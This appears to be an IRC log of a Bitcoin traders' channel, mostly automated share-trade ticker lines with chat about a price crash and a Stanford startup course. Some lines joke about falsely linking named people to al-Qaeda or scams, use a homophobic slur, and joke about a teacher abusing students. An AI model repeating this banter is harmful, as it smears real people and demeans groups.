20:50:25 [HAVELOCK] [ASICM] 2 @ 0.04 = 0.08 BTC [-] Jul 05 20:50:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.0401 = 2.005 BTC [-] Jul 05 20:50:27 [MPEX] [S.MPOE] 4000 @ 0.00080892 = 3.2357 BTC [+] Jul 05 20:50:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.040011 = 2.0006 BTC [-] Jul 05 20:50:31 [HAVELOCK] [ASICM] 20 @ 0.04 = 0.8 BTC [-] Jul 05 20:50:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.04001 BTC [-] Jul 05 20:50:41 [BTCTC] [TAT.ASICMINER] 25 @ 0.04 = 1 BTC [-] Jul 05 20:50:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Jul 05 20:50:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.04 = 0.28 BTC [-] Jul 05 20:51:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.04 = 0.4 BTC [-] Jul 05 20:51:06 [BTCTC] [TAT.ASICMINER] 25 @ 0.04 = 1 BTC [-] Jul 05 20:51:08 [BTCTC] [TAT.ASICMINER] 25 @ 0.04 = 1 BTC [-] Jul 05 20:51:09 [BTCTC] [TAT.ASICMINER] 25 @ 0.04 = 1 BTC [-] Jul 05 20:51:30 lol Jul 05 20:51:38 we are now in the August crash period of the previous bubble pop.. http://i.imgur.com/fZwy3xd.png Jul 05 20:52:24 [BTCTC] [ASICMINER-PT] 5 @ 4.003006 = 20.015 BTC [+] Jul 05 20:52:25 [BTCTC] [BASIC-MINING] 4 @ 0.173001 = 0.692 BTC [+] Jul 05 20:52:41 [BTCTC] [ASICMINER-PT] 2 @ 4.1 = 8.2 BTC [+] Jul 05 20:52:46 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [+] Jul 05 20:52:55 [BTCTC] [S.DICE-PT] 34 @ 0.002359 = 0.0802 BTC [-] Jul 05 20:53:47 [BTCTC] [TAT.ASICMINER] 40 @ 0.039012 = 1.5605 BTC [-] Jul 05 20:54:13 [BTCTC] [ASICMINER-PT] 1 @ 4.003002 BTC [-] Jul 05 20:54:23 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.00437 = 0.0393 BTC [+] Jul 05 20:54:47 [HAVELOCK] [ASICM] 3 @ 0.04000001 = 0.12 BTC [+] Jul 05 20:55:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.039012 = 0.117 BTC [-] Jul 05 20:55:48 [HAVELOCK] [ASICM] 1 @ 0.04 BTC [-] Jul 05 20:55:49 [HAVELOCK] [ASICM] 2 @ 0.04 = 0.08 BTC [-] Jul 05 20:56:13 [BTCTC] [AMC-PT] 136 @ 0.001844 = 0.2508 BTC [-] Jul 05 20:56:16 [BTCTC] [TAT.ASICMINER] 25 @ 0.039011 = 0.9753 BTC [-] Jul 05 20:57:22 http://i.imgur.com/NdqUVSj.jpg Jul 05 20:57:43 Bugpowder: so where do we go from here? Jul 05 20:57:52 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [+] Jul 05 20:58:13 probly down to 55 then a healthy bounce over a couple weeks Jul 05 20:58:18 then the long downtrend Jul 05 20:58:22 drop to 50, bouce to 65. drift down to 15 over the next 4 months as the death of bitcoin articles come into effect Jul 05 20:58:31 Then I may buy back in Jul 05 20:58:43 so I should sell some now Jul 05 20:58:49 though I will probably still have shitloads of coins due to illiquidity in this market environment Jul 05 20:59:28 [HAVELOCK] [ASICM] 3 @ 0.04 = 0.12 BTC [-] Jul 05 21:00:41 [HAVELOCK] [SDICE] 8 @ 0.18100403 = 1.448 BTC [+] Jul 05 21:00:49 [HAVELOCK] [ASICM] 10 @ 0.039111 = 0.3911 BTC [-] Jul 05 21:00:50 [HAVELOCK] [ASICM] 3 @ 0.03911 = 0.1173 BTC [-] Jul 05 21:00:51 [HAVELOCK] [ASICM] 31 @ 0.0391 = 1.2121 BTC [-] Jul 05 21:00:53 [HAVELOCK] [ASICM] 1 @ 0.039 BTC [-] Jul 05 21:00:54 [HAVELOCK] [ASICM] 1 @ 0.039 BTC [-] Jul 05 21:00:54 [HAVELOCK] [ASICM] 88 @ 0.03875 = 3.41 BTC [-] Jul 05 21:01:52 [HAVELOCK] [ASICM] 35 @ 0.039999 = 1.4 BTC [+] Jul 05 21:02:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.039011 = 0.2731 BTC [-] Jul 05 21:03:14 ;;ticker --last Jul 05 21:03:14 66.66000 Jul 05 21:04:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.04 = 0.08 BTC [+] Jul 05 21:04:09 [BTCTC] [TAT.ASICMINER] 18 @ 0.039011 = 0.7022 BTC [-] Jul 05 21:04:14 satan just sold his bitcoins Jul 05 21:04:35 Devil! It's the Devil! Run fer yor livs! Jul 05 21:05:04 Oh wait, he's not coming to invade the mortal realm. He's just coming to do his banking. Carry on. Jul 05 21:05:11 [BTCTC] [TAT.ASICMINER] 67 @ 0.041 = 2.747 BTC [+] Jul 05 21:05:12 [BTCTC] [DMS.SELLING] 15 @ 0.029972 = 0.4496 BTC [+] Jul 05 21:06:16 [BTCTC] [ASICMINER-PT] 1 @ 4.003002 BTC [-] Jul 05 21:06:29 [BTCTC] [ASICMINER-PT] 2 @ 4.003002 = 8.006 BTC [-] Jul 05 21:06:35 [BTCTC] [DMS.PURCHASE] 1 @ 0.049181 BTC [-] Jul 05 21:07:16 goddamnit Jul 05 21:07:26 pankkake: I have NOT sold my bitcoins Jul 05 21:07:37 hehe Jul 05 21:07:39 [BTCTC] [ASICMINER-PT] 2 @ 4.46 = 8.92 BTC [+] Jul 05 21:07:40 because I cant figure out how to send coins to coinbase Jul 05 21:07:45 [BTCTC] [ASICMINER-PT] 12 @ 4.003002 = 48.036 BTC [-] Jul 05 21:07:48 yknow maybe mp was right Jul 05 21:07:53 btc is fueled on drama Jul 05 21:07:59 we have no current drama Jul 05 21:08:08 so it turns on itself Jul 05 21:08:10 [BTCTC] [TAT.ASICMINER] 92 @ 0.039001 = 3.5881 BTC [-] Jul 05 21:08:12 to make some Jul 05 21:08:30 [BTCTC] [ASICMINER-PT] 1 @ 4.003002 BTC [-] Jul 05 21:09:12 [BTCTC] [ASICMINER-PT] 1 @ 4.003001 BTC [-] Jul 05 21:09:20 [BTCTC] [ASICMINER-PT] 3 @ 4.003 = 12.009 BTC [-] Jul 05 21:09:26 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Jul 05 21:09:33 [BTCTC] [ASICMINER-PT] 3 @ 4.001 = 12.003 BTC [-] Jul 05 21:10:06 [HAVELOCK] [ASICM] 15 @ 0.039124 = 0.5869 BTC [-] Jul 05 21:10:16 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [+] Jul 05 21:10:22 [HAVELOCK] [ASICM] 36 @ 0.039124 = 1.4085 BTC [-] Jul 05 21:10:39 [HAVELOCK] [ASICM] 1 @ 0.039123 BTC [-] Jul 05 21:10:40 [HAVELOCK] [ASICM] 234 @ 0.03912 = 9.1541 BTC [-] Jul 05 21:11:03 ThickAsThieves: well, maybe people should do something like Jul 05 21:11:10 connect friedcat to the alqueda Jul 05 21:11:29 go for it Jul 05 21:12:22 I cant, Im an AM shareholder Jul 05 21:13:02 [HAVELOCK] [ASICM] 1 @ 0.0392 BTC [+] Jul 05 21:13:21 maybe it's time to reveal theymos as pirate? Jul 05 21:13:23 [HAVELOCK] [ASICM] 7 @ 0.0392 = 0.2744 BTC [+] Jul 05 21:13:28 ThickAsThieves: that'd work Jul 05 21:13:45 and hes also the guy behind bfl AND amazingrando Jul 05 21:15:03 [BTCTC] [AMC-PT] 7 @ 0.001888 = 0.0132 BTC [+] Jul 05 21:15:31 [BTCTC] [AMC-PT] 164 @ 0.001844 = 0.3024 BTC [-] Jul 05 21:15:53 [BTCTC] [AMC-PT] 10 @ 0.0018 = 0.018 BTC [-] Jul 05 21:16:05 [HAVELOCK] [ASICM] 95 @ 0.03919999 = 3.724 BTC [-] Jul 05 21:16:33 [BTCTC] [AMC-PT] 10 @ 0.00176 = 0.0176 BTC [-] Jul 05 21:16:58 ;;ticker Jul 05 21:16:59 MtGox BTCUSD ticker | Best bid: 66.67003, Best ask: 67.00000, Bid-ask spread: 0.32997, Last trade: 66.67002, 24 hour volume: 58412.08911006, 24 hour low: 66.29789, 24 hour high: 81.70000, 24 hour vwap: 73.24371 Jul 05 21:17:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.039013 = 0.1951 BTC [+] Jul 05 21:17:09 Over in BitFunder there's a guy who just IPO'd a fiat asset for flipping houses Jul 05 21:17:11 [BTCTC] [TAT.ASICMINER] 7 @ 0.039012 = 0.2731 BTC [-] Jul 05 21:17:16 he signed the contract this morning Jul 05 21:17:18 [BTCTC] [TAT.ASICMINER] 8 @ 0.03901 = 0.3121 BTC [-] Jul 05 21:17:19 but guess what Jul 05 21:17:28 [BTCTC] [AMC-PT] 356 @ 0.001759 = 0.6262 BTC [-] Jul 05 21:17:30 never cashed out his btc Jul 05 21:17:40 ouch Jul 05 21:18:21 [BTCTC] [BASIC-MINING] 6 @ 0.173001 = 1.038 BTC [+] Jul 05 21:18:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.039014 BTC [+] Jul 05 21:18:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.039013 BTC [-] Jul 05 21:19:06 [BTCTC] [BASIC-MINING] 5 @ 0.173 = 0.865 BTC [-] Jul 05 21:19:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.03901 = 0.078 BTC [-] Jul 05 21:19:29 [BTCTC] [DMS.MINING] 12 @ 0.02025 = 0.243 BTC [-] Jul 05 21:19:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.03901 BTC [-] Jul 05 21:19:42 [BTCTC] [BASIC-MINING] 3 @ 0.16801 = 0.504 BTC [-] Jul 05 21:20:00 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00437 BTC [+] Jul 05 21:20:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00437 BTC [+] Jul 05 21:20:17 [BTCTC] [BASIC-MINING] 6 @ 0.168 = 1.008 BTC [-] Jul 05 21:20:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.039001 BTC [-] Jul 05 21:20:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.039001 = 0.156 BTC [-] Jul 05 21:20:23 Silly stuff... Jul 05 21:21:01 [HAVELOCK] [ASICM] 11 @ 0.03919219 = 0.4311 BTC [-] Jul 05 21:21:09 [BTCTC] [TAT.ASICMINER] 17 @ 0.039001 = 0.663 BTC [-] Jul 05 21:23:14 [BTCTC] [BFMINES] 335 @ 0.004 = 1.34 BTC Jul 05 21:23:38 hahha Jul 05 21:23:54 that rentalscam company? Jul 05 21:24:02 [HAVELOCK] [ASICM] 60 @ 0.03919999 = 2.352 BTC [+] Jul 05 21:24:11 [HAVELOCK] [ASICM] 1 @ 0.03919999 BTC [+] Jul 05 21:25:07 [BTCTC] [DMS.PURCHASE] 9 @ 0.049181 = 0.4426 BTC [-] Jul 05 21:25:36 [HAVELOCK] [ASICM] 12 @ 0.03919999 = 0.4704 BTC [+] Jul 05 21:26:17 [BTCTC] [DMS.MINING] 3 @ 0.02025 = 0.0608 BTC [-] Jul 05 21:26:50 [BTCTC] [ASICMINER-PT] 1 @ 4.128 BTC [-] Jul 05 21:26:54 [BTCTC] [DMS.SELLING] 3 @ 0.0291 = 0.0873 BTC [-] Jul 05 21:27:45 [MPEX] [S.MPOE] 1900 @ 0.00080385 = 1.5273 BTC [-] Jul 05 21:27:45 [MPEX] [S.MPOE] 4650 @ 0.0008025 = 3.7316 BTC [-] Jul 05 21:27:54 [HAVELOCK] [SDICE] 1 @ 0.18100303 BTC [-] Jul 05 21:28:09 [HAVELOCK] [SDICE] 1 @ 0.18100202 BTC [-] Jul 05 21:28:14 [HAVELOCK] [SDICE] 1 @ 0.18100101 BTC [-] Jul 05 21:29:09 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [+] Jul 05 21:29:53 [HAVELOCK] [ASICM] 10 @ 0.042 = 0.42 BTC [+] Jul 05 21:31:10 [HAVELOCK] [ASICM] 12 @ 0.041203 = 0.4944 BTC [-] Jul 05 21:31:11 [HAVELOCK] [ASICM] 547 @ 0.041202 = 22.5375 BTC [-] Jul 05 21:32:27 [HAVELOCK] [ASICM] 2 @ 0.039251 = 0.0785 BTC [-] Jul 05 21:32:36 [HAVELOCK] [ASICM] 1 @ 0.039251 BTC [-] Jul 05 21:32:38 [HAVELOCK] [ASICM] 1 @ 0.03925 BTC [-] Jul 05 21:32:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.039248 BTC [+] Jul 05 21:33:04 [BTCTC] [ASICMINER-PT] 2 @ 4.13 = 8.26 BTC [-] Jul 05 21:33:10 [BTCTC] [ASICMINER-PT] 1 @ 4.128 BTC [-] Jul 05 21:33:15 [HAVELOCK] [ASICM] 1 @ 0.03925 BTC [-] Jul 05 21:33:22 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [+] Jul 05 21:33:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.039248 BTC [+] Jul 05 21:33:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.039253 BTC [+] Jul 05 21:34:43 [HAVELOCK] [ASICM] 1 @ 0.039193 BTC [-] Jul 05 21:34:54 [HAVELOCK] [ASICM] 1 @ 0.039193 BTC [-] Jul 05 21:35:03 [HAVELOCK] [ASICM] 89 @ 0.03919219 = 3.4881 BTC [-] Jul 05 21:35:12 [HAVELOCK] [ASICM] 1 @ 0.039121 BTC [-] Jul 05 21:35:12 [HAVELOCK] [ASICM] 33 @ 0.03912 = 1.291 BTC [-] Jul 05 21:35:18 [HAVELOCK] [ASICM] 1 @ 0.03912 BTC [-] Jul 05 21:35:23 [HAVELOCK] [ASICM] 90 @ 0.038701 = 3.4831 BTC [-] Jul 05 21:35:55 [HAVELOCK] [ASICM] 16 @ 0.038701 = 0.6192 BTC [-] Jul 05 21:36:26 [HAVELOCK] [SDICE] 1 @ 0.1755 BTC [-] Jul 05 21:36:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.041 = 0.205 BTC [+] Jul 05 21:36:48 [HAVELOCK] [ASICM] 4 @ 0.038701 = 0.1548 BTC [-] Jul 05 21:36:53 [HAVELOCK] [ASICM] 1 @ 0.0380003 BTC [-] Jul 05 21:36:55 [HAVELOCK] [ASICM] 1 @ 0.03800002 BTC [-] Jul 05 21:37:04 [BTCTC] [BFMINES] 5000 @ 0.004 = 20 BTC Jul 05 21:37:08 [HAVELOCK] [ASICM] 4 @ 0.03800002 = 0.152 BTC [-] Jul 05 21:37:55 [HAVELOCK] [ASICM] 2 @ 0.03919 = 0.0784 BTC [+] Jul 05 21:37:57 [HAVELOCK] [ASICM] 1 @ 0.039193 BTC [+] Jul 05 21:37:58 [BTCTC] [TAT.ASICMINER] 281 @ 0.041 = 11.521 BTC [+] Jul 05 21:38:12 [HAVELOCK] [ASICM] 2 @ 0.039193 = 0.0784 BTC [+] Jul 05 21:39:12 [HAVELOCK] [ASICM] 1 @ 0.04 BTC [+] Jul 05 21:39:51 [BTCTC] [TAT.ASICMINER] 14 @ 0.04114 = 0.576 BTC [+] Jul 05 21:42:30 [BTCTC] [AMC-PT] 1 @ 0.001801 BTC [+] Jul 05 21:43:22 [BTCTC] [AMC-PT] 48 @ 0.0018 = 0.0864 BTC [-] Jul 05 21:43:53 [BTCTC] [ASICMINER-PT] 2 @ 4.01 = 8.02 BTC [-] Jul 05 21:43:59 [BTCTC] [ASICMINER-PT] 3 @ 4.005 = 12.015 BTC [-] Jul 05 21:44:04 [BTCTC] [ASICMINER-PT] 3 @ 4.003002 = 12.009 BTC [-] Jul 05 21:44:13 [BTCTC] [ASICMINER-PT] 2 @ 4.00002 = 8 BTC [-] Jul 05 21:44:18 [BTCTC] [ASICMINER-PT] 1 @ 4.000013 BTC [-] Jul 05 21:44:31 [BTCTC] [ASICMINER-PT] 3 @ 4.000013 = 12 BTC [-] Jul 05 21:44:42 [BTCTC] [ASICMINER-PT] 3 @ 4.000012 = 12 BTC [-] Jul 05 21:44:47 [BTCTC] [ASICMINER-PT] 2 @ 4.000011 = 8 BTC [-] Jul 05 21:44:49 [BTCTC] [TAT.ASICMINER] 21 @ 0.041 = 0.861 BTC [-] Jul 05 21:44:54 [BTCTC] [ASICMINER-PT] 2 @ 4.000011 = 8 BTC [-] Jul 05 21:45:00 [BTCTC] [ASICMINER-PT] 1 @ 4.00001 BTC [-] Jul 05 21:45:17 ;;next Jul 05 21:45:18 Error: Couldn't get RSS feed. Jul 05 21:46:13 [BTCTC] [AMC-PT] 10 @ 0.001944 = 0.0194 BTC [+] Jul 05 21:46:31 [BTCTC] [BTC-BOND] 1 @ 0.009903 BTC [-] Jul 05 21:46:51 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [+] Jul 05 21:47:02 [BTCTC] [DMS.MINING] 1 @ 0.02 BTC [-] Jul 05 21:47:04 [BTCTC] [ASICMINER-PT] 18 @ 4.000011 = 72.0002 BTC [-] Jul 05 21:47:04 [BTCTC] [DMS.MINING] 2 @ 0.0198 = 0.0396 BTC [-] Jul 05 21:47:06 [BTCTC] [DMS.MINING] 63 @ 0.01962 = 1.2361 BTC [-] Jul 05 21:47:08 [BTCTC] [TAT.ASICMINER] 23 @ 0.042336 = 0.9737 BTC [+] Jul 05 21:47:13 [BTCTC] [TAT.ASICMINER] 27 @ 0.042689 = 1.1526 BTC [+] Jul 05 21:47:42 [BTCTC] [ASICMINER-PT] 1 @ 4.00001 BTC [-] Jul 05 21:48:39 [HAVELOCK] [ASICM] 1 @ 0.04 BTC [+] Jul 05 21:50:41 [HAVELOCK] [ASICM] 4 @ 0.04 = 0.16 BTC [+] Jul 05 21:51:59 [HAVELOCK] [ASICM] 1 @ 0.040796 BTC [+] Jul 05 21:53:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Jul 05 21:53:14 [BTCTC] [TAT.ASICMINER] 47 @ 0.0393 = 1.8471 BTC [-] Jul 05 21:53:17 [BTCTC] [TAT.ASICMINER] 20 @ 0.039255 = 0.7851 BTC [-] Jul 05 21:53:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.039255 BTC [-] Jul 05 21:53:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.039254 BTC [-] Jul 05 21:53:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.039254 BTC [-] Jul 05 21:53:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.039254 BTC [-] Jul 05 21:53:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.039002 BTC [-] Jul 05 21:53:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.039002 BTC [-] Jul 05 21:53:31 [BTCTC] [TAT.ASICMINER] 279 @ 0.039001 = 10.8813 BTC [-] Jul 05 21:53:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.039001 BTC [-] Jul 05 21:53:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.039 = 0.78 BTC [-] Jul 05 21:53:40 [BTCTC] [TAT.ASICMINER] 25 @ 0.039 = 0.975 BTC [-] Jul 05 21:53:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [-] Jul 05 21:53:48 [BTCTC] [TAT.ASICMINER] 20 @ 0.039 = 0.78 BTC [-] Jul 05 21:53:49 [BTCTC] [TAT.ASICMINER] 365 @ 0.039 = 14.235 BTC [-] Jul 05 21:53:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [-] Jul 05 21:54:09 [BTCTC] [TAT.ASICMINER] 25 @ 0.039 = 0.975 BTC [-] Jul 05 21:54:40 [BTCTC] [TAT.ASICMINER] 587 @ 0.039 = 22.893 BTC [-] Jul 05 21:56:03 [HAVELOCK] [SDICE] 3 @ 0.177 = 0.531 BTC [+] Jul 05 21:57:07 [HAVELOCK] [SDICE] 6 @ 0.177999 = 1.068 BTC [+] Jul 05 21:57:50 [HAVELOCK] [ASICM] 11 @ 0.040599 = 0.4466 BTC [-] Jul 05 21:59:45 [HAVELOCK] [ASICM] 68 @ 0.04 = 2.72 BTC [-] Jul 05 22:01:22 [BTCTC] [DMS.MINING] 1 @ 0.020297 BTC [+] Jul 05 22:03:08 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004451 = 0.4451 BTC [+] Jul 05 22:06:29 [HAVELOCK] [HIM] 1 @ 0.354 BTC [+] Jul 05 22:06:35 [HAVELOCK] [ASICM] 1 @ 0.03999 BTC [-] Jul 05 22:06:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.039487 BTC [+] Jul 05 22:07:28 [HAVELOCK] [ASICM] 6 @ 0.03999 = 0.2399 BTC [-] Jul 05 22:07:38 [BTCTC] [TAT.ASICMINER] 49 @ 0.039487 = 1.9349 BTC [+] Jul 05 22:07:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.039488 BTC [+] Jul 05 22:07:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.039488 BTC [+] Jul 05 22:07:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.03949 BTC [+] Jul 05 22:07:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.03949 BTC [+] Jul 05 22:07:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.03949 BTC [+] Jul 05 22:07:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.03949 BTC [+] Jul 05 22:07:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.03949 BTC [+] Jul 05 22:09:17 [BTCTC] [TAT.ASICMINER] 25 @ 0.039489 = 0.9872 BTC [-] Jul 05 22:09:51 under 4 huh. Jul 05 22:10:22 just for a bit Jul 05 22:11:40 you think ? Jul 05 22:11:50 [HAVELOCK] [ASICM] 1 @ 0.038751 BTC [-] Jul 05 22:11:52 [HAVELOCK] [ASICM] 1 @ 0.03875 BTC [-] Jul 05 22:11:53 [HAVELOCK] [ASICM] 234 @ 0.038433 = 8.9933 BTC [-] Jul 05 22:11:53 [HAVELOCK] [ASICM] 57 @ 0.03843 = 2.1905 BTC [-] Jul 05 22:11:55 [HAVELOCK] [ASICM] 1 @ 0.03842 BTC [-] Jul 05 22:11:56 [HAVELOCK] [ASICM] 6 @ 0.03841001 = 0.2305 BTC [-] Jul 05 22:11:57 [HAVELOCK] [ASICM] 6 @ 0.03841 = 0.2305 BTC [-] Jul 05 22:11:58 [HAVELOCK] [ASICM] 50 @ 0.0383 = 1.915 BTC [-] Jul 05 22:11:59 [HAVELOCK] [ASICM] 160 @ 0.0383 = 6.128 BTC [-] Jul 05 22:12:05 been wrong before Jul 05 22:12:10 it happens. Jul 05 22:12:18 It won't happen again Jul 05 22:12:28 ? Jul 05 22:12:41 am never again over 4? Jul 05 22:12:58 no no... me being wrong lol Jul 05 22:13:16 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004679 = 0.0094 BTC [+] Jul 05 22:13:37 oh :) Jul 05 22:13:54 [HAVELOCK] [ASICM] 1 @ 0.039898 BTC [+] Jul 05 22:13:55 Like ever? On any topic? Jul 05 22:14:05 Sorry to hear you have less than 1 day to live. Jul 05 22:14:50 maybe he just took a vow of silence ? Jul 05 22:15:01 [BTCTC] [TAT.VIRTUALMINE] 78 @ 0.00468 = 0.365 BTC [+] Jul 05 22:16:08 [BTCTC] [COGNITIVE] 1 @ 0.300001 BTC [-] Jul 05 22:16:34 ;;bcstats Jul 05 22:16:36 Current Blocks: 244963 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 988 blocks | Next Difficulty In About: 5 days, 14 hours, 43 minutes, and 38 seconds | Next Difficulty Estimate: 24589498.8272 | Estimated Percent Change: 15.25249 Jul 05 22:17:08 [HAVELOCK] [SDICE] 51 @ 0.1755 = 8.9505 BTC [-] Jul 05 22:17:17 [BTCTC] [AMC-PT] 5 @ 0.001944 = 0.0097 BTC [+] Jul 05 22:17:48 [BTCTC] [TAT.VIRTUALMINE] 78 @ 0.004679 = 0.365 BTC [-] Jul 05 22:19:13 " tbh im kinda fascinated with this entire blender to 3d printer jazz i keep seeing when i search for whatever related stuffs...you gotta figure ppl'd be able to make some seriously insane dildos" Jul 05 22:19:20 beware girls getting into 3d printing... Jul 05 22:19:24 [BTCTC] [DMS.MINING] 9 @ 0.020297 = 0.1827 BTC [+] Jul 05 22:19:34 [HAVELOCK] [ASICM] 2 @ 0.0391 = 0.0782 BTC [-] Jul 05 22:19:48 or gays Jul 05 22:20:18 i think it's all fruities involved as it is neh ? Jul 05 22:20:22 you know anyone straight into 3d ?! Jul 05 22:20:37 even you gave it up. Jul 05 22:21:39 maybe im just in a straight period Jul 05 22:21:43 lol Jul 05 22:22:15 [BTCTC] [DMS.MINING] 5 @ 0.020298 = 0.1015 BTC [+] Jul 05 22:23:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.039489 = 0.3949 BTC [-] Jul 05 22:23:33 [HAVELOCK] [ASICM] 100 @ 0.0385 = 3.85 BTC [-] Jul 05 22:24:55 [HAVELOCK] [ASICM] 174 @ 0.0385 = 6.699 BTC [-] Jul 05 22:24:57 [HAVELOCK] [ASICM] 30 @ 0.039447 = 1.1834 BTC [+] Jul 05 22:24:58 [HAVELOCK] [ASICM] 35 @ 0.03944799 = 1.3807 BTC [+] Jul 05 22:24:59 [HAVELOCK] [ASICM] 557 @ 0.039449 = 21.9731 BTC [+] Jul 05 22:25:30 [HAVELOCK] [ASICM] 16 @ 0.039448 = 0.6312 BTC [-] Jul 05 22:27:41 http://www.coindesk.com/stanford-university-startups-course-build-a-bitcoin-crowdfunding-site/ Jul 05 22:27:44 Stanford University startups course: Build a bitcoin crowdfunding site Jul 05 22:28:02 bitfunders for everyone! Jul 05 22:34:08 [BTCTC] [ASICMINER-PT] 10 @ 4.05 = 40.5 BTC [+] Jul 05 22:34:13 [BTCTC] [ASICMINER-PT] 3 @ 4.001 = 12.003 BTC [-] Jul 05 22:34:20 [BTCTC] [ASICMINER-PT] 10 @ 4.000002 = 40 BTC [-] Jul 05 22:34:28 [BTCTC] [ASICMINER-PT] 2 @ 4.000001 = 8 BTC [-] Jul 05 22:34:32 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Jul 05 22:34:39 [BTCTC] [ASICMINER-PT] 5 @ 4 = 20 BTC [-] Jul 05 22:34:56 [BTCTC] [ASICMINER-PT] 2 @ 4 = 8 BTC [-] Jul 05 22:35:02 [BTCTC] [ASICMINER-PT] 2 @ 4 = 8 BTC [-] Jul 05 22:35:13 [BTCTC] [ASICMINER-PT] 7 @ 4 = 28 BTC [-] Jul 05 22:38:18 ffs. Jul 05 22:38:29 who the fuck thinks he's qualified to be doing this. Jul 05 22:38:49 Niccolo Caldararo i imagine. Jul 05 22:39:20 instructor is Balaji S. Srinivasan Jul 05 22:39:22 fwiw Jul 05 22:39:43 wait there're several Jul 05 22:39:52 the doc is in the link Jul 05 22:40:07 never heard of them. Jul 05 22:40:19 beautiful academia, people who have absolutely nothing to do with a subject teach it. Jul 05 22:41:06 mircea, how so? Jul 05 22:41:38 It says in the article "Srinivasan is the Co-founder and CTO of genomics startup Counsyl, and Pande Founder and director of the Folding@Home Project." Jul 05 22:42:10 hehe Jul 05 22:42:22 And that there's lecturers from Silicon Valley startups too... Jul 05 22:42:36 the 3rd one looks like he's 17 Jul 05 22:42:45 i guess every bitocin project needs one Jul 05 22:43:31 Namworld perhaps i'm missing something if you imagine folding@home has anything to do with bitcoin. Jul 05 22:43:48 this must be part of that trend where you are only cool if you are some sort of "incubator" Jul 05 22:43:49 They don't teach Bitcoin at all. Jul 05 22:43:54 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Jul 05 22:44:06 They teach startups/business Jul 05 22:44:07 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Jul 05 22:44:11 ... Jul 05 22:44:18 MPEx - The Finance Incubator Jul 05 22:44:19 i must have misread the fucking link. Jul 05 22:44:29 http://www.coindesk.com/stanford-university-startups-course-build-a-folding@home-crowdfunding-site/ Jul 05 22:44:33 quite fucking properly ThickAsThieves Jul 05 22:44:57 o wait, that actually 404s. problem solved i guess. Jul 05 22:45:22 http://www.scribd.com/doc/151866935/Stanford-University-Startups-Engineering-course Jul 05 22:45:25 Startup Engineering is the name of the course Jul 05 22:45:28 Stanford University Startups Engineering course Jul 05 22:45:52 It just happens to be that the final project for the course is to build your own Bitcoin crowdfunding thingy Jul 05 22:45:53 so basically what you're saying is that the coindesk idiots came up with some more random nonsense and it's not really the guy's fault ? Jul 05 22:46:02 sigh. Jul 05 22:46:08 http://folding.stanford.edu/ Jul 05 22:46:10 [BTCTC] [DMS.PURCHASE] 5 @ 0.049181 = 0.2459 BTC [-] Jul 05 22:46:10 Folding@home Jul 05 22:46:11 DUDE. education is not a "just so happens" thing. Jul 05 22:46:36 "i'm the pe teacher. it just so happens i fucked all the students" Jul 05 22:46:53 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Jul 05 22:47:10 No... but the course's project will obviously be related to building some startup project Jul 05 22:47:19 I mean it just so happen it's Bitcoin related. Jul 05 22:47:31 But the fact it's Bitcoin isn't really important I guess. Jul 05 22:47:35 the point being that it's in no way bitcoin related Jul 05 22:47:38 it just claism to be Jul 05 22:47:42 for no apparent reason whatsoever. Jul 05 22:47:52 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Jul 05 22:47:54 cuz it's cool Jul 05 22:48:00 o o right. and they're in california Jul 05 22:48:09 so must add the cool words to whatever they're doing. my bad! Jul 05 22:48:28 Well because the project integrates Bitcoin. Jul 05 22:48:36 it gets the kids to pay attention maybe 